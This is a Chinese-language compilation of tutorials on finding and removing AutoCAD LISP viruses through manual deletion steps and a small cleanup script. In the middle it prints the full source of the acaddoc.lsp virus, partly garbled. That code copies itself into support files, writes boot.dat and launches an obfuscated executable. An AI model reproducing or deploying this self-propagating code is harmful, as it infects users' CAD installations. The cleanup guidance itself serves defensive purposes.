CAD病毒查杀方法教程怎么手动杀毒

在软件操作过程中发现楼层无法切换的解决方法（主要由acaddoc.lsp病毒文件引起）。

第一种
1、注意首先将感染acaddoc.lsp病毒的工程文件夹打开，把文件中的acaddoc.lsp文件删除。

2、删除c盘中的boot.dat文件。

3、在鲁班软件安装目录中（sysdat\sys16）找到acaddoc.lsp文件，打开后全选所有内容并删除，保存后关闭。

然后右击该文件夹选择属性，点选只读并确定。

第二种
刚才那个病毒的问题，试过了在我们软件里加一个空的lsp文件打开我们软件就不会有问题了
不过其实病毒还在的，要彻底清除病毒，要删除C:\Documents and
Settings\Administrator\Application Data\Autodesk\AutoCAD
2006\R16.2\chs\Support 这个文件夹里的acadapq.lsp和acaddoc.lsp文件，把acad.mnl 文件里最后的
(load "acadapq")
(princ)
这两句话删除，再删除所有的acaddoc.lsp文件就可以了。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为，360杀毒软件查出病毒名为。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

把下面的程序复制到记事本，另存为为“52cad.lsp”（注意：必须是在能够看到扩展名的情况下，lsp扩展名才有用），保存之后，将此文件拖入到正在使用的cad，在命令行输入“52cad”即可按提示杀cad病毒。

(defun c:52cad (/ stol del RenameNext cl regpath supportpath jk-lsp yes-lsp )(defun stol (str / n lis str)(while (setq n (vl-string-search ";" str)) (setq lis (cons (substr str 1 n) lis)) (setq str (substr str (+ 2 n))) )(reverse (cons str lis)) )(setq regpath "HKEY_CURRENT_USER\\Software\\Autodesk\\AutoCAD") (setq supportpath (cons (vl-string-trim "\\" (getvar "dwgprefix"))(stol (vl-string-trim ";" (getvar "acadprefix"))) ) )(if (null (vl-registry-read regpath "jk-lsp")) (vl-registry-write regpath "jk-lsp""acad.lsp;acaddoc.lsp;acad.fas;acaddoc.fas;acad.vlx;acaddoc.vlx" ) )(setq jk-lsp (stol(vl-string-trim ";" (vl-registry-read regpath "jk-lsp")) ) )(if (null (setq yes-lsp (vl-registry-read regpath"yes-lsp"))) (vl-registry-write regpath "yes-lsp" "" ) )(defun del (file)(command "shell" (strcat "attrib -r \"" file "\"")) (while (not (vl-file-delete file))) )(defun Rename (file)(command "shell" (strcat "attrib -r \"" file "\"")) (while (not (vl-file-rename file(strcat (vl-filename-directory file) "\\"(getstring "\n请输入新文件名:") ) ) ) ) )(defun Next (file) (vl-registry-write regpath "yes-lsp"(strcat (vl-registry-read regpath "yes-lsp") file ";") ) )(defun cl (file / kword)(INITGET "Del Rename Next") (setq kword(getkword "\n删除(Del);重命名(Rename);加入到信任列表(Next):" ) )(cond ((= kword "Del") (del file)) ((= kword "Rename") (Rename file)) ((= kword "Next") (Next file)) ) )(foreach a supportpath (foreach b jk-lsp(setq file (strcat a "\\" b)) (if (vl-file-size file)(if (not (vl-string-search file yes-lsp))(progn (princ (strcat "\n发现" file "请处理:\n")) (cl file) )(princ (strcat "\n发现" file "已在信任列表中!\n")) )) ) )(princ "\nlsp病毒监控程序命令'52cad'!")(princ) ) (c:52cad)。

1.CAD病毒的简介与危害CAD病毒，实际上是基于CAD程序支持的vlisp语言编写的一类代码。

它和你用过的绝大多数CAD小插件其实一样，是必须依附于CAD环境下才能运行的程序。

1.1目前常见CAD病毒有以下几个特点：1.它完全依附于CAD运行，在不打开CAD的情况下，它既不会运行，也不会主动传播。

2.它的作用范围仅限于CAD及其附属插件（如天正、探索者等）；不会破坏CAD软件本身，但可能改乱CAD 设置、改乱CAD图纸数据。

3.除了CAD及其附属插件（如天正、探索者等）外，你电脑里别的软件卡、慢、崩溃，或者系统卡、慢、蓝屏死机，这些都跟CAD病毒没有一毛钱关系。

4.由于目前新的WIN7、WIN10系统权限严格，免费杀毒软件普及，CAD版本不断升级，CAD病毒作用范围有限，给病毒作者带来不了收益，所以基本上没有新出来的CAD病毒了，还在流行的CAD病毒，都是十多年前遗留下来的，很古老的。

1.2目前还在流行的CAD病毒存在以下几点危害：1.部分CAD病毒会搞一些无聊的弹窗【不吃饭了快干活、党不会亏待你、现在时间是XX等等】，但是这类病毒太显眼，已经被杀的差不多了，比较少见.2.大多数还在流行的病毒，都是后台默默感染传播，没有任何提示，不注意是看不到的。

这类病毒的代码里，还能运行的主要是他的自身复制传播功能、修改CAD设置、修改图纸数据功能。

所以一些CAD病毒会乱改你CAD 设置、图纸设置、图纸数据，导致CAD操作异常、复制粘贴出问题、图纸文件异常大等，这是它的主要危害之一。

3.正如前边说的，CAD病毒大多比较古老，代码陈旧，而软件更新换代，病毒的代码运行已经出现很多缺陷、错误。

当你中CAD病毒的同时，你又在使用探索者、天正之类基于CAD的插件，在这些软件打开加载的时候，CAD病毒同时也在加载，且它的代码存在缺陷错误而卡住、或进入死循环，常常同时导致天正探索者加载失败或者在加载时卡死，这也是它目前最主要的危害之一。

CAD中移动move变复制copy病毒手动清除方法
CAD中操作:移动move变复制copy病毒手动清除方法
中毒特征:
打开DWG文件显示:
程序作者QQ:252545152
现在时间是:XX点XX分了的哦!
好好干了啦!党是不会亏待你的!
老板的眼睛是雪亮的啦!
手工清除方法:首先请关闭CAD后,再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件,(记住一定要搜索完所有的磁盘,如C、D、E、F、G等等。

然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。

方法是:点击开始 - 搜索 -然后点击搜索所有文件-- 点击更多高级选项,勾选影藏的文件和文件夹。

全部或部分文件名填写
acad.fas;acad.sys;acad.ini;lcm.fas;dwgrun.exe; dwgrun.bat;winsys.ini;winfas.ini 然后点击搜
索把搜出的文件全部删除。

1次搜不干净搜索4次删除4 次。

就OK了。

CAD病毒专杀软件分享每天积累一点，让自己更专业！关注CAD制图有问必答筑原cad病毒专杀是专为AutoCad软件开发的一款病毒专杀修复及免疫于一体的专杀工具！一.扫描病毒的流程如下:二.处理病毒1.acad.lsp 很多以(defun s::startup (/old_cmd 等开头的lsp病毒代码中毒后,打开文件自动建立acad.lsp文件等.2.acaddoc.lsp以 (setq flagx t) (setq bz'(setq flagx t)')开头lsp代码中毒后acad.mnl 及cad的support下的所有lsp文件某位都加上此段病毒代码.天正等软件无法启动.3.acad.fas版本1 有病毒样本,完美处理.1.病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框 2.注册表增加HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwgrun 3.增加文件c:\WINDOWS\system32\copyfile.vbsc:\WINDOWS\system32\copy.sys(acad.fas副本)cad安装目录,很多子目录中有acad.fas和lcm.fas文件.版本2 本人无病毒样本,网友提供解决方法.1.注册表增加 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sys:'C:\WINDOWS\system32\copyfile.vbs'2.增加文件系统目录中增加 winsys.ini、winfas.ini、dwgrun.batcad安装目录,很多子目录中有acad.sys、acad.fas、acad.ini版本3 有病毒样本,完美处理. 1.注册表增加HKCU\Software\FileKenHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup 写入BEI_ZHU值200302142.拷贝文件 C:\Program Files\AutoCAD 2004\Fonts\isohztxt.shx (acad.fas副本)C:\WINDOWS\DivX.finC:\WINDOWS\system32\SHFR.CMD3.修改文件acad.mnl文件中间增加 (setvar'cmdecho' 0) (command'slide')结尾增加 (princ)(if (null stol) (load 'lcm'''))acad.pgp文件中间增加 SLIDE, SHFR, 5,4.acad.vlx版本1 有病毒样本,完美处理.1. 打开图档会自动生成一个acad.vlx的文件 2.CAD目录的acetauto.lsp ai_utils.lsp acad.mnl文件中间被添加 (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))3.Help目录增加logo.gif (acad.vlx文件的副本)版本2 本人无病毒样本,网友提供解决方法.1.破坏性的acad.vlx,打开CAD图纸,发现图纸上只有一句英文:MUST re_cover!以前画的图全没有了.2.运行re_cover就可以恢复被打乱隐藏的图纸3.全盘搜索acad.vlx删除常见问题：01. 新变种未知病毒如何查杀?假设病毒文件名为acad.fas,在黑名单中添加acad.fas名字,选项中选择放至回收站,手动搜索CAD搜索支持目录中的lsp、mnu文件是否感染病毒代码.如感染手动清除。

CAD病毒查杀方法教程怎么手动杀毒病毒无处不在，随时入侵我们电脑，CAD也一样，那CAD文件病毒怎么清除?本文就来教大家使用手动设置查杀CAD病毒的方法，具体步骤请看下文。

CAD病毒查杀方法介绍：手动查杀CAD病毒：1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(如"acad.mnl"文件中无此行代码可忽略此操作)附："acad.mnl"文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD 的版本和版本代号。

(注意：目录C:\Documents and Settings\是系统隐藏文件夹)补充：CAD使用小技巧1、文字镜像如何设置转动与不转动A、在镜像前，输入MIRRTEXT指令B、输入新值0 代表不转动;输入新值1代表转动C、MIRRTEXT指令完成后，输入MI镜像指令就OK了2、CAD的版本转换A、CAD高版本可以打开所有低版本的图纸B、CAD低版本不可以打开高版本的图纸C、高版本转成低版本的方法，直接点击另存为，将文件类型可以改成任意的低版本D、将低版本转换成高版本，就比较复杂了，需要第三方软件，也就是版本转换器。